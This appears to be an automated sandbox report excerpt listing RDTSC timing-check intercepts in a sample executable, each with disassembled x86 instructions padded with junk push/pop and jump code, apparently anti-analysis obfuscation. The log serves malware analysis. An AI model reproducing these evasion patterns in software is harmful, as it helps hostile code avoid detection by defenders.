                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6F46 second address: 5F6F4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6F4E second address: 5F6F55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5A1FB4 second address: 5A1FD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FC69CE9FC58h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007FC69CE9FC63h 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6002E5 second address: 6002FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jno 00007FC69CB9B4A6h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6002FD second address: 600318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF232 second address: 5FF236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF236 second address: 5FF23C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF39A second address: 5FF3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC69CB9B4B7h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF3BC second address: 5FF3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF7CE second address: 5FF7D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FF7D2 second address: 5FF7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FFA95 second address: 5FFA99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FFD19 second address: 5FFD47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FC69CE9FC5Ch 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FC69CE9FC5Eh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FFD47 second address: 5FFD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69CB9B4B4h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FFD60 second address: 5FFD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5FFD66 second address: 5FFD6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 604D7B second address: 604DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FC69CE9FC62h 0x0000000c jp 00007FC69CE9FC5Ah 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 jmp 00007FC69CE9FC66h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 604DBA second address: 604DC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 603C39 second address: 603C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BB9C4 second address: 5BB9D6 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC69CB9B4A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BB9D6 second address: 5BB9DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BB9DC second address: 5BB9E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BBDF2 second address: 408009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC61h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC69CE9FC63h 0x00000011 nop 0x00000012 mov di, bx 0x00000015 push dword ptr [ebp+122D16DDh] 0x0000001b mov cx, AA31h 0x0000001f call dword ptr [ebp+122D1FAEh] 0x00000025 pushad 0x00000026 clc 0x00000027 xor eax, eax 0x00000029 stc 0x0000002a jmp 00007FC69CE9FC64h 0x0000002f mov edx, dword ptr [esp+28h] 0x00000033 stc 0x00000034 mov dword ptr [ebp+122D2D51h], eax 0x0000003a pushad 0x0000003b push ebx 0x0000003c jg 00007FC69CE9FC56h 0x00000042 pop edx 0x00000043 mov ecx, dword ptr [ebp+122D2D25h] 0x00000049 popad 0x0000004a sub dword ptr [ebp+122D1E1Ch], ebx 0x00000050 mov esi, 0000003Ch 0x00000055 sub dword ptr [ebp+122D1CA3h], ebx 0x0000005b add esi, dword ptr [esp+24h] 0x0000005f jg 00007FC69CE9FC57h 0x00000065 lodsw 0x00000067 mov dword ptr [ebp+122D1E1Ch], ebx 0x0000006d add eax, dword ptr [esp+24h] 0x00000071 pushad 0x00000072 push edi 0x00000073 mov dword ptr [ebp+122D1CA3h], ecx 0x00000079 pop ebx 0x0000007a mov dword ptr [ebp+122D2198h], ebx 0x00000080 popad 0x00000081 mov ebx, dword ptr [esp+24h] 0x00000085 stc 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BBEC1 second address: 408009 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c adc edi, 504DCB9Ah 0x00000012 push dword ptr [ebp+122D16DDh] 0x00000018 mov edi, esi 0x0000001a call dword ptr [ebp+122D1FAEh] 0x00000020 pushad 0x00000021 clc 0x00000022 xor eax, eax 0x00000024 stc 0x00000025 jmp 00007FC69CB9B4B4h 0x0000002a mov edx, dword ptr [esp+28h] 0x0000002e stc 0x0000002f mov dword ptr [ebp+122D2D51h], eax 0x00000035 pushad 0x00000036 push ebx 0x00000037 jg 00007FC69CB9B4A6h 0x0000003d pop edx 0x0000003e mov ecx, dword ptr [ebp+122D2D25h] 0x00000044 popad 0x00000045 sub dword ptr [ebp+122D1E1Ch], ebx 0x0000004b mov esi, 0000003Ch 0x00000050 sub dword ptr [ebp+122D1CA3h], ebx 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jg 00007FC69CB9B4A7h 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D1E1Ch], ebx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c pushad 0x0000006d push edi 0x0000006e mov dword ptr [ebp+122D1CA3h], ecx 0x00000074 pop ebx 0x00000075 mov dword ptr [ebp+122D2198h], ebx 0x0000007b popad 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 stc 0x00000081 nop 0x00000082 push eax 0x00000083 push edx 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BBF68 second address: 5BBF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC68h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BBF89 second address: 5BBF8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC13D second address: 5BC174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], esi 0x0000000d push edx 0x0000000e push edx 0x0000000f and cl, 00000074h 0x00000012 pop ecx 0x00000013 pop edx 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007FC69CE9FC5Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC2AC second address: 5BC2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC49F second address: 5BC4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC4B1 second address: 5BC4C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC4C0 second address: 5BC4C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC85D second address: 5BC876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FC69CB9B4ACh 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5BC876 second address: 5BC891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC67h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 604441 second address: 604464 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC69CB9B4B7h 0x0000000b jc 00007FC69CB9B4A6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 604464 second address: 604468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 608137 second address: 60813B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60813B second address: 608148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5796EF second address: 579705 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 579705 second address: 579709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607DBA second address: 607DBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607DBE second address: 607DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FC69CE9FC56h 0x0000000e jnl 00007FC69CE9FC56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607DD2 second address: 607DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607DD6 second address: 607DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FC69CE9FC62h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607DFE second address: 607E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607E04 second address: 607E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 607E08 second address: 607E20 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC69CB9B4ABh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B16A second address: 60B16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B16E second address: 60B172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B172 second address: 60B18F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jbe 00007FC69CE9FC56h 0x00000010 jmp 00007FC69CE9FC5Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 60B18F second address: 60B194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 611875 second address: 611887 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610B96 second address: 610BAD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC69CB9B4AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BAD second address: 610BB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BB4 second address: 610BBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 610BBB second address: 610BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6112E3 second address: 6112E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6112E7 second address: 6112EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61143D second address: 611443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 611443 second address: 611447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616074 second address: 616085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FC69CB9B4A6h 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616332 second address: 616346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616346 second address: 616353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616353 second address: 61635B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61635B second address: 61635F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61635F second address: 616365 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61662D second address: 616633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616633 second address: 616639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616639 second address: 61663E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616A3A second address: 616A3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 616A3E second address: 616A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007FC69CB9B4A6h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61B499 second address: 61B4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop esi 0x00000007 ja 00007FC69CE9FC5Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 61B4B2 second address: 61B4B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6231C8 second address: 6231DE instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC69CE9FC5Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jg 00007FC69CE9FC56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6211EF second address: 6211F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 6211F9 second address: 621204 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 62134E second address: 621352 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 621352 second address: 62136A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC69CE9FC5Bh 0x00000011 pop edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AD5 second address: 622AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AD9 second address: 622ADD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622ADD second address: 622AE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622AE3 second address: 622B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007FC69CE9FC56h 0x0000000d jmp 00007FC69CE9FC65h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622DF6 second address: 622E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CB9B4ACh 0x00000009 jmp 00007FC69CB9B4AEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 622E14 second address: 622E5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 js 00007FC69CE9FC56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jg 00007FC69CE9FCA4h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC69CE9FC69h 0x0000001b jmp 00007FC69CE9FC69h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 628AB7 second address: 628AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC69CB9B4B5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 628C7E second address: 628C84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
